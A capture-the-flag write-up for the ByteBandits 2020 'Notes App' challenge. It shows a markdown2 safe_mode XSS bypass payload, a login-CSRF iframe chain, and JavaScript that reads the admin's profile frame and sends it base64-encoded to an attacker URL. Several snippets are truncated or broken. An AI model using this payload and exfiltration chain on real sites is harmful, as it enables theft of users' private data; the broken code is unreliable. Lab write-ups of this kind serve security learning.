ByteBandits 2020 Notes App

For this task, a very simple Python application and its source code is provided.



main app

The application let us register, login, submit a link and edit a single field “note” that will be displayed on /profile.

The application code is pretty straightforward and allows us to insert markdown on our own profile page.

The python code responsible for markdown rendering (md2html) is the following:

@app.route("/update_notes", methods=["POST"])
def update_notes():
    # markdown support!!
    current_user.notes = markdown2.markdown(request.form.get("notes"), safe_mode=True)
    return redirect("/profile")

Looking in the requirements.txt shows us that this is the latest version of markdown2:


However, I found this github issue: github issue # 341

A possible injection is demonstrated:


This will be rendered as:

<p><http://g<!s://q?<!-&lt;<a href="http://g"><script>alert(1);/*</a>->a><http://g<!s://g.c?<!-&lt;<a href="http://g">a\\*/</script>alert(1);/*</a>->a></p>

Then, I tried that on my profile page and it worked.

This should be a good entry point to our exploitation steps.


Having a working payload is cool, but remember that the payload is reflected on the /profile page so we are not going to be able to send this link to the admin.

By the way, the admin uses this code to access our page:

async def main(url):
    browser = await launch(headless=True,
                           args=['--no-sandbox', '--disable-gpu'])
    page = await browser.newPage()
    await page.goto("")
    await page.type("input[name='username']", "admin")
    await page.type("input[name='password']", os.environ.get("ADMIN_PASS"))
    await asyncio.wait(['button'),
    await page.goto(url)
    await browser.close()

First, he authenticates himself on the application, and then access the URL provided.

Also, another important thing to notice is that the /login endpoint accepts GET and does not have any check on the HTTP verb used:

@app.route("/login", methods=["GET", "POST"]) # Accepts GET and POST
def login():

    # Redirect the user if he is already authenticated.
    if current_user.is_authenticated:
        return redirect("/profile")

    if request.args.get("username"):
        id = request.args.get("username")
        password = request.args.get("password")
        user = User.query.filter_by(id=id).first()
        if user and user.check_password(password=password):
            return redirect("/profile")

        flash("Incorrect creds")
        return redirect("/login")
    return render_template("login.html")

So, here is our strategy:

Send to the admin, a page containing 3 iframes:

  1. The first one will point to the /profile page
  2. The second one will point to the /logout page after the first one rendered (Used to logout the admin before we access /login for the third one)
  3. The third one will point to our profile and execute arbitrary Javascript

The third iframe is the most important and will retrieve information from the parent iframe pointing to /profile to retrieve the admin note.

Before triggering the admin on this custom hosted page, we have to host script on our profile page.

To do that, I used a simple script reading arbitrary Javascript and “converting” it into a markdown2 payload:

#!/usr/bin/env python3
# @SakiiR

import base64
from urllib.parse import quote_plus as urlencode

def main():
    content = ""
    with open("payload.js", "rb") as f:
        content = base64.b64encode(

    payload = urlencode(content)

if __name__ == "__main__":

I also used this following Javascript file to retrieve the parent iframe content:

let content = top.frames[0].document.documentElement.innerHTML;

content = btoa(content);
window.location.replace("" + content);

The following HTML page has been hosted on to perform the iframe thing:

      style="width: 100%;"
    <!-- First action, retrieve the admin /profile into the iframe -->

    <iframe style="width: 100%;" id="bframe" src=""></iframe>
    <iframe style="width: 100%;" id="cframe" src=""></iframe>

      const a = document.getElementById("aframe");
      const b = document.getElementById("bframe");
      const c = document.getElementById("cframe");

      b.onload = () => {
        // Third action, login as me and get redirected on my own /profile containing Javascript retrieving the **aframe** content
        c.src =

      // Second action, logout the admin so that he can login as me
      a.onload = () => {
        b.src = "";

Everything’s ready, we send the link to the admin via the /visit_link endpoint and get the flag:
